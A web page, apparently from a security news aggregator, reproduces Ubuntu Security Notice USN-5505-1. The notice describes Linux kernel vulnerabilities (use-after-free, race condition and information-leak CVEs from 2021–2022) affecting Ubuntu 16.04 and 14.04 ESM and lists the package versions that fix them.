When confronted with novel attack techniques being encountered in the wild, security leaders must provide an opportunity to empower your detection operations and overcome the limitations inherent with other malware prevention solutions. A free resource to test the efficacy of a mail provider's security controls is the Email Security Assessment.

**About the Author**

    

Josiah Smith has almost a decade of experience in the realm of security. Before becoming a threat engineer, Josiah worked as a cyber operator, overseeing signature management and host-based detection programs. He spent several years in a room without windows, focusing on network detection, threat hunting, and IR investigations. He began his career as a member of the US Air Force, and most of his experience is with the DoD.

Empower Your Security Operations Team to Combat Emerging Threats

Ubuntu Security Notice 5505-1 - Norbert Slusarek discovered a race condition in the CAN BCM networking protocol of the Linux kernel leading to multiple use-after-free vulnerabilities. A local attacker could use this issue to execute arbitrary code. Likang Luo discovered that a race condition existed in the Bluetooth subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5505-1  
July 07, 2022

linux-lts-xenial, linux-kvm vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 ESM  
- Ubuntu 14.04 ESM

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-kvm: Linux kernel for cloud environments  
- linux-lts-xenial: Linux hardware enablement kernel from Xenial for Trusty

Details:

Norbert Slusarek discovered a race condition in the CAN BCM networking  
protocol of the Linux kernel leading to multiple use-after-free  
vulnerabilities. A local attacker could use this issue to execute arbitrary  
code. (CVE-2021-3609)

Likang Luo discovered that a race condition existed in the Bluetooth  
subsystem of the Linux kernel, leading to a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2021-3752)

It was discovered that the NFC subsystem in the Linux kernel contained a  
use-after-free vulnerability in its NFC Controller Interface (NCI)  
implementation. A local attacker could possibly use this to cause a denial  
of service (system crash) or execute arbitrary code. (CVE-2021-3760)

Szymon Heidrich discovered that the USB Gadget subsystem in the Linux  
kernel did not properly restrict the size of control requests for certain  
gadget types, leading to possible out of bounds reads or writes. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2021-39685)

It was discovered that the Ion Memory Manager subsystem in the Linux kernel  
contained a use-after-free vulnerability. A local attacker could possibly  
use this to cause a denial of service (system crash) or execute arbitrary  
code. (CVE-2021-39714)

Eric Biederman discovered that the cgroup process migration implementation  
in the Linux kernel did not perform permission checks correctly in some  
situations. A local attacker could possibly use this to gain administrative  
privileges. (CVE-2021-4197)

Lin Ma discovered that the NFC Controller Interface (NCI) implementation in  
the Linux kernel contained a race condition, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2021-4202)

Sushma Venkatesh Reddy discovered that the Intel i915 graphics driver in  
the Linux kernel did not perform a GPU TLB flush in some situations. A  
local attacker could use this to cause a denial of service or possibly  
execute arbitrary code. (CVE-2022-0330)

It was discovered that the PF_KEYv2 implementation in the Linux kernel did  
not properly initialize kernel memory in some situations. A local attacker  
could use this to expose sensitive information (kernel memory).  
(CVE-2022-1353)

It was discovered that the virtual graphics memory manager implementation  
in the Linux kernel was subject to a race condition, potentially leading to  
an information leak. (CVE-2022-1419)

Minh Yuan discovered that the floppy disk driver in the Linux kernel  
contained a race condition, leading to a use-after-free vulnerability. A  
local attacker could possibly use this to cause a denial of service (system  
crash) or execute arbitrary code. (CVE-2022-1652)

It was discovered that the Atheros ath9k wireless device driver in the  
Linux kernel did not properly handle some error conditions, leading to a  
use-after-free vulnerability. A local attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-1679)

It was discovered that the Marvell NFC device driver implementation in the  
Linux kernel did not properly perform memory cleanup operations in some  
situations, leading to a use-after-free vulnerability. A local attacker  
could possibly use this to cause a denial of service (system) or execute  
arbitrary code. (CVE-2022-1734)

It was discovered that some Intel processors did not completely perform  
cleanup actions on multi-core shared buffers. A local attacker could  
possibly use this to expose sensitive information. (CVE-2022-21123)

It was discovered that some Intel processors did not completely perform  
cleanup actions on microarchitectural fill buffers. A local attacker could  
possibly use this to expose sensitive information. (CVE-2022-21125)

It was discovered that some Intel processors did not properly perform  
cleanup during specific special register write operations. A local attacker  
could possibly use this to expose sensitive information. (CVE-2022-21166)

It was discovered that the USB Gadget file system interface in the Linux  
kernel contained a use-after-free vulnerability. A local attacker could use  
this to cause a denial of service (system crash) or possibly execute  
arbitrary code. (CVE-2022-24958)

赵子轩 discovered that the 802.2 LLC type 2 driver in the Linux kernel did not  
properly perform reference counting in some error conditions. A local  
attacker could use this to cause a denial of service. (CVE-2022-28356)

It was discovered that the 8 Devices USB2CAN interface implementation in  
the Linux kernel did not properly handle certain error conditions, leading  
to a double-free. A local attacker could possibly use this to cause a  
denial of service (system crash). (CVE-2022-28388)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 ESM:  
  linux-image-4.4.0-1110-kvm      4.4.0-1110.120  
  linux-image-kvm                 4.4.0.1110.107

Ubuntu 14.04 ESM:  
  linux-image-4.4.0-229-generic   4.4.0-229.263~14.04.1  
  linux-image-4.4.0-229-lowlatency  4.4.0-229.263~14.04.1  
  linux-image-generic-lts-xenial  4.4.0.229.199  
  linux-image-lowlatency-lts-xenial  4.4.0.229.199  
  linux-image-virtual-lts-xenial  4.4.0.229.199

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
  https://ubuntu.com/security/notices/USN-5505-1  
  CVE-2021-3609, CVE-2021-3752, CVE-2021-3760, CVE-2021-39685,  
  CVE-2021-39714, CVE-2021-4197, CVE-2021-4202, CVE-2022-0330,  
  CVE-2022-1353, CVE-2022-1419, CVE-2022-1652, CVE-2022-1679,  
  CVE-2022-1734, CVE-2022-21123, CVE-2022-21125, CVE-2022-21166,  
  CVE-2022-24958, CVE-2022-28356, CVE-2022-28388

Tag

#intel